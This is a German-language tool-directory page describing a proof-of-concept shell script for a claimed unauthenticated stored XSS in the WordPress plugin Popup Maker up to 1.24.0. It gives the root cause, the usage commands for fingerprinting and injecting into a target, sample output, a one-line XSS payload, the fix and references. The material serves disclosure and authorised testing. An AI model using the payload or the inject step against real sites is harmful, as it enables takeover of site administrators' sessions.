Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-87915-PoC-pwnVader — Shell-PoC für CVE-2026-87915, eine unauthentifizierte gespeicherte XSS-Schwachstelle im WordPress-Plugin Popup Maker (<=1.24.0). Fingerprintet das Plugin und demonstriert die Payload-Injektion. | Kitploit
Tools/GitHubGitHub/pwnvader/cve-2026-87915-poc-pwnvader
SchwachstellenscannerWeb-SchwachstellenscannerSchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHub
pwnvader/cve-2026-87915-poc-pwnvader

CVE-2026-87915-PoC-pwnVader

Shell-PoC für CVE-2026-87915, eine unauthentifizierte gespeicherte XSS-Schwachstelle im WordPress-Plugin Popup Maker (<=1.24.0). Fingerprintet das Plugin und demonstriert die Payload-Injektion.

Repository anzeigen
1vor 4 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-87915 — Popup Maker <= 1.24.0 — Unauthentifiziertes gespeichertes XSS (values[Name])

Autor: pwnVader · Lizenz: MIT (Repository-Wurzel)

KomponentePopup Maker – Boost Sales, Conversions, Optins, Subscribers (WordPress-Plugin)
TypCWE-79 — Gespeichertes Cross-Site Scripting
Betroffen<= 1.24.0
Behoben1.25.0
CVECVE-2026-87915 — CVSS 3.1 7.2 (AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N)
PoCpoc.sh

Zusammenfassung

Ein öffentliches Popup Maker Optin-/Newsletter-Formular akzeptiert den Parameter values[Name] ohne Sanitisierung (action=pum_sub_form). Der Wert wird serverseitig gespeichert und später im Admin-Bildschirm Subscribers gerendert. Die auf die Ausgabe angewendete wp_kses()-Filterung ist in diesem Kontext unzureichend: HTML-Entities innerhalb erlaubter Attributwerte überleben die Normalisierung und werden von der jQuery( link.attr('href') )-DOM-Senke in wp-admin/js/common.js ausgewertet, wenn ein Administrator einen Anker des kontextuellen Hilfe-Tabs anklickt. Nettoeffekt: unauthentifiziertes gespeichertes XSS gegen einen Administrator (ein Klick auf der Admin-Seite erforderlich).

Verwendung

root@kitploit:~
# Interactive menu
./poc.sh

# Read-only: fingerprint the plugin and detect a public subscribe form
./poc.sh check --target https://example.com

# Store the payload (writes ONE subscriber row; requires authorization)
./poc.sh inject --target https://example.com --authorized

inject verwendet standardmäßig eine eindeutige Test-E-Mail und gibt die Bereinigungsschritte aus (Admin-UI oder DELETE FROM wp_pum_subscribers WHERE email = '…';).

Beispielausgabe (check)

root@kitploit:~
== CVE-2026-87915 PoC (check) ==
target: https://example.com

[1] Plugin fingerprint (read-only)
  [PASS] Popup Maker assets are served (plugin installed)
  [info] detected version: 1.22.0
  [PASS] version 1.22.0 is in the affected range (<= 1.24.0)

[2] Public subscribe form detection (read-only)
  [PASS] Popup Maker markup found on the site (a public form may accept values[Name])

Beispielausgabe (inject, Labor)

root@kitploit:~
[3] Stored injection via pum_sub_form (writes one subscriber row)
  response: {"success":true,"data":{"message":"You have been subscribed!"}}
  [PASS] the server accepted and stored the payload unauthenticated

Die Umgehung, in einer Zeile

root@kitploit:~
values[Name] = <a href="https://github.com/pwnvader/cve-2026-87915-poc-pwnvader/blob/main/%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E">VDP-XSS-PROOF</a>
  • values[name] (Kleinschreibung) ist das normale Feld; das gemischtgeschriebene values[Name] kollidiert während der PHP-Array-Key-Normalisierung und trägt die Payload durch.
  • wp_kses() erlaubt das <a href>-Element; das entity-kodierte `` innerhalb des Attributs überlebt die Filterung und wird später dekodiert/normalisiert.
  • wp-admin/js/common.js wertet jQuery( link.attr('href') ) aus, was das dekodierte HTML parst und den onerror-Handler auslöst.

Behebung

  • Aktualisieren Sie Popup Maker auf 1.25.0 oder später (esc_html() + sanitize_text_field() auf den gespeicherten Wert; siehe den Vendor-Changeset für classes/Admin/Subscribers/Table.php).
  • Übergangslösung: öffentliche Abonnentenformulare einschränken/deaktivieren oder values[Name] auf WAF-Ebene filtern.

Referenzen

  • NVD — CVE-2026-87915: https://nvd.nist.gov/vuln/detail/CVE-2026-87915
  • Vendor-Fix: Popup Maker 1.25.0 (Plugin-Trac-Changeset 3690634)

Haftungsausschluss

Nur für autorisierte Sicherheitstests. check ist schreibgeschützt; inject erstellt genau eine Test- Abonnentenzeile — löschen Sie diese anschließend mit dem ausgegebenen Bereinigungsbefehl.

Tool herunterladen